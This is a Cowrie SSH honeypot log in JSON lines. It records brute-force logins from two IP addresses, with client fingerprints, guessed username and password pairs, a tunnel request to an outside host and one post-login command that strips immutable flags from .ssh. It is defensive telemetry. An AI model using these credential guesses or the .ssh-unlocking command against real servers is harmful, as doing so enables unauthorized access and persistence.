{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:04:43.366473Z","src_ip":"212.227.235.229","session":"9305493f3224"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56656,"dst_ip":"1.2.3.4","dst_port":22,"session":"438a1bde65b9","protocol":"ssh","message":"New connection: 212.227.235.229:56656 (1.2.3.4:22) [session: 438a1bde65b9]","sensor":"my-vps","timestamp":"2025-08-26T14:04:43.601727Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:04:43.602460Z","src_ip":"212.227.235.229","session":"438a1bde65b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:04:43.840158Z","src_ip":"212.227.235.229","session":"438a1bde65b9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T14:04:45.422812Z","src_ip":"212.227.235.229","session":"438a1bde65b9"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:04:46.664359Z","src_ip":"212.227.235.229","session":"438a1bde65b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56660,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5ee692d517e","protocol":"ssh","message":"New connection: 212.227.235.229:56660 (1.2.3.4:22) [session: b5ee692d517e]","sensor":"my-vps","timestamp":"2025-08-26T14:04:46.896959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:04:46.897744Z","src_ip":"212.227.235.229","session":"b5ee692d517e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:04:47.963633Z","src_ip":"212.227.235.229","session":"b5ee692d517e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:04:48.894699Z","src_ip":"212.227.235.229","session":"b5ee692d517e"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:04:49.130374Z","src_ip":"212.227.235.229","session":"b5ee692d517e"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:04:49.131315Z","src_ip":"212.227.235.229","session":"9305493f3224"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47172,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a246f96daa6","protocol":"ssh","message":"New connection: 212.227.235.229:47172 (1.2.3.4:22) [session: 7a246f96daa6]","sensor":"my-vps","timestamp":"2025-08-26T14:05:15.172991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:05:15.546680Z","src_ip":"212.227.235.229","session":"7a246f96daa6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T14:05:15.547342Z","src_ip":"212.227.235.229","session":"7a246f96daa6"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:05:17.272073Z","src_ip":"212.227.235.229","session":"b7956b59e542"}
{"eventid":"cowrie.login.success","username":"root","password":"Mukul@123","message":"login attempt [root/Mukul@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:05:18.759336Z","src_ip":"212.227.235.229","session":"7a246f96daa6"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:05:19.469421Z","src_ip":"212.227.235.229","session":"7a246f96daa6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41952,"dst_ip":"1.2.3.4","dst_port":22,"session":"ceff9fbab9c6","protocol":"ssh","message":"New connection: 212.227.125.160:41952 (1.2.3.4:22) [session: ceff9fbab9c6]","sensor":"my-vps","timestamp":"2025-08-26T14:05:25.750131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:05:25.752212Z","src_ip":"212.227.125.160","session":"ceff9fbab9c6"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T14:05:25.802490Z","src_ip":"212.227.125.160","session":"ceff9fbab9c6"}
{"eventid":"cowrie.login.failed","username":"solana","password":"SOL!@#","message":"login attempt [solana/SOL!@#] failed","sensor":"my-vps","timestamp":"2025-08-26T14:05:25.955455Z","src_ip":"212.227.125.160","session":"ceff9fbab9c6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:05:27.008063Z","src_ip":"212.227.125.160","session":"ceff9fbab9c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34318,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2fb00c7187c","protocol":"ssh","message":"New connection: 212.227.125.160:34318 (1.2.3.4:22) [session: f2fb00c7187c]","sensor":"my-vps","timestamp":"2025-08-26T14:05:39.211673Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T14:05:39.223700Z","src_ip":"212.227.125.160","session":"f2fb00c7187c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T14:05:40.423254Z","src_ip":"212.227.125.160","session":"f2fb00c7187c"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234","message":"login attempt [user/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T14:05:42.585692Z","src_ip":"212.227.125.160","session":"f2fb00c7187c"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:05:44.073585Z","src_ip":"212.227.125.160","session":"f2fb00c7187c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37656,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2ae97a3100b","protocol":"ssh","message":"New connection: 212.227.125.160:37656 (1.2.3.4:22) [session: f2ae97a3100b]","sensor":"my-vps","timestamp":"2025-08-26T14:05:53.264611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T14:05:53.343478Z","src_ip":"212.227.125.160","session":"f2ae97a3100b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T14:05:53.615757Z","src_ip":"212.227.125.160","session":"f2ae97a3100b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32559,"dst_ip":"1.2.3.4","dst_port":22,"session":"c069a2aa2826","protocol":"ssh","message":"New connection: 212.227.235.229:32559 (1.2.3.4:22) [session: c069a2aa2826]","sensor":"my-vps","timestamp":"2025-08-26T14:05:53.993132Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:05:53.994958Z","src_ip":"212.227.235.229","session":"c069a2aa2826"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32946,"dst_ip":"1.2.3.4","dst_port":22,"session":"b44f08302493","protocol":"ssh","message":"New connection: 212.227.235.229:32946 (1.2.3.4:22) [session: b44f08302493]","sensor":"my-vps","timestamp":"2025-08-26T14:05:54.157473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:05:54.158144Z","src_ip":"212.227.235.229","session":"b44f08302493"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T14:05:54.320157Z","src_ip":"212.227.235.229","session":"b44f08302493"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:05:54.807228Z","src_ip":"212.227.235.229","session":"b44f08302493"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T14:05:54.970051Z","session":"b44f08302493"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-26T14:05:55.920545Z","src_ip":"212.227.125.160","session":"f2ae97a3100b"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:05:57.168669Z","src_ip":"212.227.125.160","session":"f2ae97a3100b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50762,"dst_ip":"1.2.3.4","dst_port":22,"session":"c71e0b3dd6f0","protocol":"ssh","message":"New connection: 212.227.235.229:50762 (1.2.3.4:22) [session: c71e0b3dd6f0]","sensor":"my-vps","timestamp":"2025-08-26T14:06:10.760500Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:06:10.761538Z","src_ip":"212.227.235.229","session":"c71e0b3dd6f0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:06:10.990807Z","src_ip":"212.227.235.229","session":"c71e0b3dd6f0"}
{"eventid":"cowrie.login.success","username":"root","password":"123456aB","message":"login attempt [root/123456aB] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:06:11.957352Z","src_ip":"212.227.235.229","session":"c71e0b3dd6f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:06:12.470005Z","src_ip":"212.227.235.229","session":"c71e0b3dd6f0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T14:06:12.470816Z","src_ip":"212.227.235.229","session":"c71e0b3dd6f0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T14:06:12.472262Z","src_ip":"212.227.235.229","session":"c71e0b3dd6f0"}
